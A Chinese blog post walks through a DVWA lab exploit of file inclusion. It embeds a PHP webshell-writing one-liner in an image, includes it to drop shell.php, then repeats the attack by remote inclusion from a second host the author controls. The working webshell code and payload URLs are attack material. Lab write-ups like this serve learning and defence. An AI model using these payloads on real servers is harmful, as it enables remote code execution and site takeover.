LFI本地包含的简单利用原理实现

最新推荐文章于 2023-01-18 10:30:00 发布
最新推荐文章于 2023-01-18 10:30:00 发布
阅读量543 收藏 1
点赞数
分类专栏: 学习过程
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sx234com/article/details/89151232
版权

一、基本思路:

1、图片插入一句话木马。利用上传功能上传此图片。

2、利用文件包含漏洞,读取此含有一句话木马的图片,生成真正shell文件,然后拿下shell。

靶机使用dvwa

二、具体步骤:

1、制作一句话图片木马使用edjpgcom进行制作。如图将目标图片拖入文件夹中的

自动打开了软件,输入一句话木马 <?PHP fputs(fopen('shell.php','w'),'<?php @eval($_POST[cmd])?>');?> 此句含义请查阅我以前的文章文件包含安全学习笔记。

点击确定,一句话木马图片制作成功!

图片中已经包含恶意代码:

2、然后访问dvwa地址,进入文件上传界面,上传此图片。

上传成功后,访问一下图片看看是否正常。我这里正常,继续下一步。

3、进入到有文件包含漏洞的页面,构造payload

 http://192.168.56.101/dvwa/vulnerabilities/fi/?page=http://192.168.56.101/dvwa/hackable/uploads/LED6.jpg

访问后执行成功:

图片乱码出现,说明访问成功!此时说明靶机的文件夹下面就生成的shell文件。如下图:

此时证明利用本地文件包含漏洞访问到的带有一句话木马的图片正确被读取解析。并且运行了图片木马中的恶意代码从而生成的shell.php文件。

5、接下来利用菜刀,连接此shell即可大功告成。

三、总结:

此次自己实践了关于本地文件包含漏洞的主要使用。其原理即读取解析本地某文件进行执行达到目的的方法。

关于RFI(远程文件包含)的利用,其实和如上大同小异。不同点在于,payload上面直接访问的是一个肉鸡地址,斗鸡地址里面对应的那个文件包含了恶意代码,访问的对象不是本地的图片而已。

例如我自己搭建了一个肉鸡靶机,www文件夹下面建了一个txt (文件名叫做info_fuck.txt)内容为:

<?PHP fputs(fopen('shell_3.php','w'),'<?php @eval($_POST[cmd])?>');?>

在靶机dvwa中,直接执行 http://192.168.56.101/dvwa/vulnerabilities/fi/?page=http://192.168.56.102/baohan/info_fuck.txt

发现也可以顺利执行,并且比本地文件包含要隐秘。

 

 

sx234com
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
LFI 漏洞的利用
Soul Blog
11-29 3208
LFI 漏洞的利用 参考链接1 参考链接2 LFI(本地文件包含漏洞),这篇文章将介绍有关该漏洞的一些利用 1、phpinfo 漏洞信息利用LFI漏洞转变为远程代码执行(RCE)漏洞的竞争条件,服务器端需要满足以下条件: LFI漏洞 任何显示PHPInfo()配置输出的脚本 脚本下载地址 得到脚本后,我们需要修改脚本中的攻击载荷, 使用命令 locate php-reverse 定位可用的php载荷位置 /usr/share/laudanum/php/php-reverse-s
php本地文件包含漏洞,本地文件包含漏洞详解---LFI
weixin_30668061的博客
03-09 1049
1概述文件包含(Local File Include)是php脚本的一大特色,程序员们为了开发的方便,常常会用到包含。比如把一系列功能函数都写进fuction.php中,之后当某个文件需要调用的时候就直接在文件头中写上一句就可以调用内部定义的函数。本地包含漏洞是PHP中一种典型的高危漏洞。由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使web server...
PHP LFI 利用临时文件 Getshell 姿势
qq_45521281的博客
06-02 2830
文章目录前言PHP LFI临时文件全局变量存储目录命名规则Windows Temporary FilePHPINFO特性测试代码漏洞分析漏洞利用php7 Segment Fault利用条件漏洞分析代码环境漏洞利用 前言 最近整理PHP文件包含漏洞姿势的时候,发现一些比较好用的姿势关于本地文件包含漏洞可以利用临时文件包含恶意代码拿到Webshell的一些奇技淫巧,于是打算详细整理一下。 PHP LFI PHP LFI本地文件包含漏洞主要是包含本地服务器上存储的一些文件,例如session文件、日志文件、临时文
文件包含原理及本地文件包含漏洞演示(本地文件,远程包含文件的测试)
gl620321的博客
05-08 4609
一.文件包含漏洞概述 1.定义:文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序。当应用程序使用攻击者控制的变量构建可执行代码的路径时,文件包含漏洞会导致攻击者任意控制运行时执行的文件。 2.文件包含漏洞的出现及危害 文件包含漏洞是一种最常见的漏洞类型,它会影响依赖于脚本运行时的web应用程序。当应用程序使用攻击者控制的变量构建可执行代码的路径时,文件包含漏洞会导致攻击...
LFI例子
weixin_45625861的博客
10-10 262
以【Hackme CTF】Web–LFI中的LFI为例 见到LFI已经可以本能地知道这是考察本地包含了,查看源代码发现参数是page要读取pages/啥啥,直接用php://filter绕过读取本地文件 https://hackme.inndy.tw/lfi/?page=php://filter/read=convert.base64-encode/resource=pages/flag 发现网页出现一行base64 Q2FuIHlvdSByZWFkIHRoZSBmbGFnPD9waHAgcmVxdWly
LFI本地包含漏洞介绍php的
03-24
### LFI(本地文件包含)漏洞详解:PHP中的利用与防范 #### LFI漏洞概述 LFI(Local File Inclusion,本地文件包含)是一种常见的Web应用程序安全漏洞,它允许攻击者通过操纵应用程序输入来访问服务器上的任意文件...
LFISploit:利用lfi +反向外壳+扫描器
04-01
LFISploit是一个针对本地文件包含(Local File Inclusion, LFI)漏洞的自动化工具,它允许黑客通过多种攻击策略来探测和利用系统中的漏洞。这个工具设计用于Windows、Linux以及OS X操作系统,具有自动配置功能,简化...
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
- 当用户可以控制包含文件路径时,可能会利用此漏洞读取服务器上的任意文件,包括但不限于配置文件、日志文件等敏感信息。 2. **远程文件包含(Remote File Inclusion, RFI)** - 这种漏洞允许攻击者从远程服务器...
php 伪造本地文件包含漏洞的代码
10-28
#### 二、本地文件包含LFI)概述 本地文件包含漏洞允许攻击者通过修改动态包含文件的路径,来读取服务器上的任意文件。这不仅可能导致敏感信息泄露,还可能被利用来执行恶意代码或进一步控制服务器。 #### 三、...
信息安全技术基础:本地文件包含漏洞.pptx
11-01
在网络安全领域,本地文件包含漏洞(Local File Inclusion,简称LFI)是一种常见的安全问题,它涉及到网站应用程序如何处理用户输入来决定要加载的本地文件。这类漏洞允许攻击者通过操纵输入参数,使程序包含并执行...
安鸾靶场-LFI本地文件包含 LFI本地文件包含LF2 文件包含漏洞练习记录
AAAAAAAAAAAA66的博客
02-04 2845
记得几个月刚接触CTF就遇到了一个文件包含漏洞题目 i春秋 afr1 解题过程 题解 原理 PHP伪协议 文件包含漏洞_AAAAAAAAAAAA66的博客-CSDN博客 记得当时的想法就是既然啥也不会,就先记下方法和操作,等最后熟悉了再对原理进行深究。 现在过了一段时间后感觉对文件包含的理解更深一步了。算是有了一点独立思考和解决问题的能力吧。 文件包含漏洞 简单一点讲,用include()函数处理的文件,都会被当成PHP代码执行。 这个文件包括字符串,图片(图片嵌入一句话木马),...
lfi读取php,php LFI读php文件源码以及直接post webshell
weixin_34743057的博客
03-28 207
最近在忙defcon的题目集训其中有一套题目里有个老外写的writeup中提到了 LFI 的另一种小技巧 原文请参考http://ddxhunter.wordpress.com/2010/03/10/lfis-exploitation-techniques/ PS: 该技巧并不是新的技术神牛肯定已经用得觉得无聊了所以当路过就行了=_,=最近在忙defcon的题目集训其中有一套题目里有个老外写的...
渗透测试练习No.18 利用phpinfo+LFI(文件包含漏洞)打进主机
hljzzj的博客
01-23 6870
phpinfo文件上传+LFI(文件包含)获取shell,suid提权
Web安全领域的探索之远程文件包含漏洞(LFI
Innocence_0的博客
01-18 1424
Web安全领域的探索之远程文件包含漏洞(LFI
文件包含漏洞
qq_50854662的博客
05-21 6681
【文件包含】文件包含漏洞知识总结 一、什么是文件包含漏洞? 1、文件包含概述 和SQL注入等攻击方式一样,文件包含漏洞也是一种“注入型漏洞”,其本质就是输入一段用户能够控制的脚本或者代码,并让服务器端执行。 什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程就叫做包含。 有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任.
文件包含漏洞全面详解
热门推荐
m0_46467017的博客
08-17 6万+
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。以PHP为例,常用的文件包含函数有以下四种。...
本地文件包含漏洞详解
发哥微课堂
06-14 2万+
0x00:漏洞定义 在通过服务器脚本的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露、恶意代码的注入等。 文件包含分为两种,一种为本地文件包含,一种为远程文件包含,此篇记录本地文件包含。本地文件包含(Local File Include),简称 LFI。 0x01:涉及函数 文件包含在 php 中,涉及到的危险函数有四个,分别是 inclu...
文件包含漏洞之——本地文件包含漏洞 (LFI)
wsnbbz的博客
03-04 2541
定义 能够读取或执行包含本地文件的漏洞,称为本地文件包含漏洞 源代码 原理 为了方便,include等函数里放的不是一个指定文件,而是一个接收文件的变量,从而造成用户可以控制参数file改变这个变量 当参数file 的值为一个指定路径的文件时,此时变量就是此路径,include函数就会执行此文件,当文件不是可执行的php文件时,就会将文件内容读取出货来,这样用户就可通过更改url里的参数进行读取...
From LFI to RCE!!(从本地文件包含到远程命令执行)
Websec
03-03 1578
翻译 原文:https://medium.com/bugbountywriteup/from-lfi-to-rce-96f352ec38c8 作者:Mohamed Sayed 漏洞类型:本地文件包含、远程命令执行 ........ 哈罗,伙伴们,这个主题我们将会讨论从本地文件包含变成远程命令执行的利用. 什么是LFI? 本地文件包含是某些Web应用程序中的漏洞,因为网站从服务器...
已知某网站存在lfi(本地文件包含),但是无法上传任何文件,针对该情况有哪些利用
最新发布
09-21
已知某网站存在本地文件包含漏洞(LFI),但无法上传任何文件,那么仍然可以利用以下方式进行攻击: 1. 获取敏感信息:利用LFI漏洞可以读取目标服务器上的本地文件,可以尝试获取敏感信息,如密码文件、配置文件、...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值